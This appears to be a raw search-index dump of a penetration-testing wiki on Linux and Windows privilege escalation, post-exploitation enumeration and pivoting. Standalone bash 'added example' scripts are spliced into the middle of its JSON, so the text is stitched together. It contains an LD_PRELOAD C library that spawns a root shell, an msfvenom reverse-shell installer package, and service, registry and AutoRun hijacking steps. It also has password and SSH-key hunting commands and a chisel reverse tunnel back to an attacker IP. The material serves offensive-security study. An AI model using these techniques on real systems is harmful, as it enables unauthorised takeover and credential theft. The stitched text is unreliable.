» Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"175","title":"Introduction"},"176":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. 
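To triage getcap output quickly, here is an added example (not the page's own code) that handles both getcap output formats (the older "path = caps" form and the newer "path caps" form printed by libcap 2.41 and later) and prints only capabilities that can lead to root; SAMPLE_GETCAP and the DANGEROUS list are constructed for the demonstration:

```bash
#!/bin/sh
# Added example (not from the original page): filter `getcap -r /` output down to
# the capabilities that give a foothold on root, in either getcap output format.

# Constructed sample mixing both formats as seen across libcap versions.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/perl cap_dac_override=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/gdb = cap_sys_ptrace+ep'

# Capabilities that let a process become root, bypass file permissions, load
# kernel code or attach to root-owned processes.
DANGEROUS='cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# interesting_caps: stdin = getcap output; prints "PATH CAP FLAGS" for each
# dangerous capability, FLAGS being the e/p/i set so you can see if it is effective.
interesting_caps() {
    awk -v danger="$DANGEROUS" '
        BEGIN { n = split(danger, d, " "); for (i = 1; i <= n; i++) bad[d[i]] = 1 }
        NF == 0 { next }
        {
            path = $1
            caps = (NF >= 3 && $2 == "=") ? $3 : $2   # "path = caps" vs "path caps"
            # split "cap_a,cap_b+ep" or "cap_a,cap_b=eip" into names and flag set
            if (match(caps, /[=+][a-z]+$/)) {
                flags = substr(caps, RSTART + 1)
                names = substr(caps, 1, RSTART - 1)
            } else { flags = ""; names = caps }
            m = split(names, c, ",")
            for (i = 1; i <= m; i++) if (c[i] in bad) printf "%s %s %s\n", path, c[i], flags
        }'
    return 0
}

# Demo on the constructed sample. On a target: getcap -r / 2>/dev/null | interesting_caps
printf '%s\n' "$SAMPLE_GETCAP" | interesting_caps
```

Each surviving line is a (binary, capability) pair to look up on GTFOBins under its capabilities section; an interpreter with cap_setuid in the effective set, as in the python example above, is the quickest win.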
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h> void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library would again be loaded first and proceed to launch /bin/bash yet again, which would again load our library, and so on. The next two lines set the group and user IDs to those of root, which ensures that the following commands run with root privileges (setgid comes first because once the UID is no longer 0, setgid(0) would fail). Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path. The dynamic linker honours LD_PRELOAD here because sudo has already switched to root before executing the command, so there is no setuid transition for it to distrust.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"176","title":"Writing the Malicious Library"},"177":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check whether any credentials you have previously found work with anything else. You should also check whether you have access to the Windows SYSTEM or SAM files or any of their backups, since those contain the hashes for the local users. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version and see if there are any kernel exploits available. 
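An added helper (not from the original page) that reads sudo -l output and extracts the two facts the LD_PRELOAD technique and the GTFOBins shell-escape technique above depend on: which LD_* variables survive env_reset, and which commands run as root with or without a password. SAMPLE_SUDO_L is constructed; kept_ld_vars and root_commands are my own names:

```bash
#!/bin/sh
# Added example (not from the original page): pull the exploitable bits out of
# `sudo -l` output: LD_* variables kept through env_reset, and root-level rules.

# Constructed sample of `sudo -l` output.
SAMPLE_SUDO_L='Matching Defaults entries for user on target:
    env_reset, env_keep+=LD_PRELOAD, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/awk
    (root) /usr/sbin/apache2
    (www-data) NOPASSWD: /usr/bin/vim'

# kept_ld_vars: stdin = sudo -l output; prints each LD_* name found in an
# env_keep setting of the Defaults block (LD_PRELOAD, LD_LIBRARY_PATH, ...).
kept_ld_vars() {
    sed -n '/Matching Defaults/,/^$/p' \
      | tr ',' '\n' \
      | grep -oE 'env_keep\+?=.*' \
      | grep -oE 'LD_[A-Z_]+' \
      | sort -u
    return 0
}

# root_commands: stdin = sudo -l output; prints "NOPASSWD <cmd>" or "PASSWD <cmd>"
# for every rule that runs as root (or ALL), skipping rules for other run-as users.
root_commands() {
    sed -n '/may run the following/,$p' \
      | awk '
          /^[[:space:]]*\((root|ALL)[^)]*\)/ {
              sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "")
              if (sub(/^NOPASSWD:[[:space:]]*/, "")) print "NOPASSWD " $0
              else print "PASSWD " $0
          }'
    return 0
}

# Demo on the constructed sample. On a target: sudo -l | kept_ld_vars; sudo -l | root_commands
printf '%s\n' "$SAMPLE_SUDO_L" | kept_ld_vars
printf '%s\n' "$SAMPLE_SUDO_L" | root_commands
```

If kept_ld_vars prints LD_PRELOAD, any entry from root_commands can carry the exploit.so above; otherwise each NOPASSWD entry is a candidate for a GTFOBins sudo shell escape.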
You should then move on to enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, and explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceed to looking for ways to bypass UAC . In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"177","title":"Methodology"},"178":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and NetworkService) READ_CONTROL SERVICE_ENUMERATE_DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenticated Users. 
LocalSystem READ_CONTROL SERVICE_ENUMERATE_DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"178","title":"Introduction"},"179":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS . winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows utility. accesschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"179","title":"Enumeration"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535, but they are completely separate. For example, DNS uses UDP port 53 for queries but TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP scanning does: open and filtered UDP ports usually send no reply, so nmap has to wait for timeouts and retransmit.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. 
Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path is given to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows treats it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. If the path is provided without quotation marks, however, the name of the executable becomes ambiguous. CreateProcess splits the string at each space character - the first segment is treated as the executable's name (with .exe appended) and the rest as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it moves on to the next space character, treats the characters up to it as the new path and tries to execute that: C:\\Program Files\\Vulnerable.exe Service\\service.exe This process repeats until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable at any of the paths that Windows will probe, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query it to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. 
What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"180","title":"Unquoted Service Paths"},"181":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"181","title":"Weak Registry Permissions"},"182":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. 
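The search order described above, reproduced as an added shell example (not the page's code) so you can see exactly which file names Windows would try for a given unquoted path; candidate_paths and is_unquoted are my own helpers and the path is constructed:

```bash
#!/bin/sh
# Added example (not from the original page): list, in order, every file name
# CreateProcess would try for an unquoted service path. Pure string handling,
# so it runs anywhere; on the target you then check write access to each parent.

# is_unquoted PATH: succeeds when PATH contains a space and is not wrapped in quotes.
is_unquoted() {
    case $1 in
        \"*)  return 1 ;;   # already quoted: not exploitable
        *\ *) return 0 ;;   # contains a space, no leading quote
        *)    return 1 ;;   # no spaces: nothing to split on
    esac
}

# candidate_paths PATH: print each prefix up to a space with .exe appended,
# followed by the real path, i.e. the order Windows probes them in.
candidate_paths() {
    full=$1
    prefix=""
    old_ifs=$IFS; IFS=' '
    set -f                 # no globbing while we split on spaces
    set -- $full
    set +f
    IFS=$old_ifs
    while [ $# -gt 1 ]; do
        prefix="${prefix:+$prefix }$1"
        printf '%s.exe\n' "$prefix"
        shift
    done
    printf '%s\n' "$full"
}

# Demo with a constructed service path like the one in the section above.
svc='C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe'
if is_unquoted "$svc"; then
    candidate_paths "$svc"
fi
```

On the target the same list is what you walk with accesschk (or icacls) looking for a parent directory you can write to; the usual one-liner to find unquoted auto-start services is wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """.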
To identify such services, it is useful to use WinPEAS. It appears that our user has write access to the service daclsvc and can also start it. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem, which is an account with more privileges than our user account. If we hold SERVICE_CHANGE_CONFIG on the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is set up a listener and start the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"182","title":"Insecure Service Permissions"},"183":{"body":"The binary executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is replace the legitimate executable with a malicious one (keeping a backup of the original) and then start or restart the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"183","title":"Introduction"},"184":{"body":"AutoRun applications are programmes which have been set up to execute automatically when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. For example, Steam, Spotify, and Discord all set this up upon installation. On its own, this does not pose a security risk. The real vulnerability lies in AutoRun executables which are writable by anyone. 
AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator needs to log in; the payload runs with the privileges of whoever logs in, not ours. As soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"184","title":"Introduction"},"185":{"body":"Windows has a group policy which, when enabled, allows any user to install a Microsoft Windows Installer package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and have the Windows Installer service execute it as SYSTEM. In order to check for this vulnerability, one need only query the following registry keys; the policy is only in effect when both the HKCU and the HKLM value are set to 1: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi package. One way to do this is with msfvenom from Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the package to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"185","title":"Introduction"},"186":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. One of the first things you should do when looking for a privilege escalation vector is to check the kernel version as well as any installed patches and determine whether it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching for the kernel version, but a cheat sheet which I like can be found here . 
Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"186","title":"Introduction"},"187":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"187","title":"Introduction"},"188":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. 
UAC, however, has different protection levels which can be configured. There are four options, two of which differ only in whether the prompt is shown on the dimmed secure desktop. The first option, and the most strict, is Always notify. If UAC is set to this, then any programme which tries to run with elevated privileges will produce a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me only when apps try to make changes to my computer. Under this configuration, regular applications still cause a UAC prompt to show up whenever they are run as administrator; however, signed Windows built-in programmes that are marked for auto-elevation can run with elevated privileges without such a prompt. The third option is the same as the default, but the UAC prompt will not dim the screen. This is intended for computers on which drawing the secure desktop is slow. Finally, Never notify means that a UAC prompt will never be shown, no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting (or a less strict one); the bypasses typically abuse the auto-elevating binaries mentioned above.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"188","title":"Introduction"},"189":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe . 
You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"189","title":"Bypassing UAC"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. 
If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"190","title":"Introduction"},"191":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"191","title":"Introduction"},"192":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . 
This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token , to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing , exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits .","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"192","title":"Introduction"},"193":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"193","title":"Post Exploitation"},"194":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"194","title":"Introduction"},"195":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. 
Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"195","title":"Linux Enumeration with LinPEAS"},"196":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"196","title":"Finding Files Containing Passwords"},"197":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"197","title":"Finding SSH Keys"},"198":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"198","title":"Introduction"},"199":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"199","title":"Enumerating the Distribution Version"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. 
Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is open. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version Information","id":"200","title":"Enumerating Linux Kernel Version Information"},"201":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"201","title":"Enumerating CPU Architecture"},"202":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"202","title":"Enumerating Running Services"},"203":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"203","title":"File 
System Enumeration"},"204":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"204","title":"Enumerate User Name and Group"},"205":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"205","title":"Enumerate Commands Runnable as Root"},"206":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"206","title":"List Users on the Machine"},"207":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"207","title":"Get History of Commands the User Has Run"},"208":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"208","title":"List Network Interfaces and Network Information"},"209":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Open Ports","id":"209","title":"List Open Ports"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"Plenty of automated tools can be found for enumerating Windows machines. 
They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"210","title":"Introduction"},"211":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"211","title":"Windows Enumeration with WinPEAS"},"212":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"212","title":"Enumerate System Information"},"213":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"213","title":"Enumerate Patches"},"214":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"214","title":"Enumerate Drives"},"215":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exfiltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"215","title":"Introduction"},"216":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. 
In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"216","title":"Introduction"},"217":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will set up a chisel server on Listen Port with reverse remotes enabled. On the compromised system run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. The R prefix marks the remote as reversed, which also swaps the meaning of \"local\" and \"remote\": Local Host and Local Port now refer to the chisel server (the attacking machine), whilst Remote Host and Remote Port are resolved from the client (the compromised machine). Once the client has connected, the chisel server will open Local Port on Local Host and tunnel it to Remote Port on Remote Host. From now on, any traffic sent to Local Port on the attacking machine will be forwarded through the compromised machine to Remote Port on Remote Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 (all interfaces) Local Port - the same as Remote Port Remote Host - 0.0.0.0 (localhost as seen from the client) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to reach port 3306 on the compromised machine via port 31337 on your attacking machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:31337:localhost:3306 & The above basically translates to \"Listen on port 31337 of my attacking machine and forward any traffic sent to it to port 3306 on the localhost of the compromised system\". The order of the two sides matters: R:localhost:3306:localhost:31337 would instead expose port 3306 of the attacking machine and forward it to port 31337 on the compromised one.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"217","title":"Creating a reverse tunnel"},"218":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. 
